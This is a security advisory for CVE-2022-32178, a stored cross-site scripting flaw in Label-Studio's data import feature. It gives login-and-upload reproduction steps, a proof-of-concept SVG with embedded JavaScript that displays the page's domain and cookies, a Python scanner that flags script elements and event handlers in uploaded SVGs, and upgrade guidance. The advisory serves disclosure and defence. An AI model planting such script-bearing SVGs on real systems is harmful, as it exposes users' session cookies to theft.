CVE-2022-32178

Date: October 29, 2022

Overview

In Label-Studio, versions v1.0.0 through v1.5.0post0 are vulnerable to Stored Cross-Site Scripting (XSS) in the “Import Data” section. An authenticated attacker can upload a carefully crafted SVG file that triggers XSS when any authenticated victim previews the uploaded file.

Details

The Label-Studio application is vulnerable to Stored XSS: an attacker can upload an SVG file that contains malicious JavaScript through “Data Import”, and the XSS is triggered when any authenticated victim previews the uploaded file.

PoC Details

1. Access http://localhost:8080/user/login/ in the browser and log in.
2. Go to the project, navigate to the “Import Data” section, and upload an SVG file containing malicious JavaScript.
3. Then access http://localhost:8080/user/login/ in another browser, log in as the owner of the project, and navigate to the project.
4. Copy the uploaded file's URL and open it in the address bar; the XSS will be triggered.

PoC Code

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain+'\n'+document.cookie);
   </script>
</svg>

Affected Environments

Label-Studio versions v1.0.0 through v1.5.0post0

Prevention

Upgrade to Label-Studio version 1.6.0
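
For instances that already accepted uploads while running an affected version, stored SVG files can be checked for active content. The following is an added example, not code from this advisory or from Label-Studio: the function name, the element and attribute lists, and the sample bytes are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Elements that can run script or embed HTML when an SVG is rendered as a document.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src"}

def _local(name):
    """Drop the '{namespace}' prefix ElementTree adds to tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def svg_active_content(data):
    """Return the reasons an uploaded SVG must not be served inline ([] if none)."""
    # Refuse entity declarations before parsing; image uploads do not need them.
    if b"<!ENTITY" in data.upper():
        return ["entity declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload, onclick, ...
                findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS:
                # Browsers ignore whitespace and control characters inside a scheme.
                url = "".join(c for c in value if c > " ").lower()
                if url.startswith(("javascript:", "data:text/html")):
                    findings.append(f"active URL in {name} on <{tag}>")
    return findings

# Constructed samples shaped like the PoC on this page, with a placeholder script body.
_HEAD = (b'<?xml version="1.0" standalone="no"?>\n'
         b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
         b'"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n'
         b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">\n'
         b'  <polygon points="0,0 0,50 50,0" fill="#009900"/>\n')
SAMPLE_WITH_SCRIPT = _HEAD + b'  <script type="text/javascript">/* placeholder */</script>\n</svg>'
SAMPLE_BENIGN = _HEAD + b"</svg>"

if __name__ == "__main__":
    for label, blob in (("with script", SAMPLE_WITH_SCRIPT), ("benign", SAMPLE_BENIGN)):
        print(label, svg_active_content(blob))
```

A scan like this is a triage aid for files already stored; it does not replace the upgrade to 1.6.0.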

Language: Python

Good to know:

Cross-Site Scripting (XSS)

CWE-79
Upgrade Version

Upgrade to version label-studio - 1.6.0

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None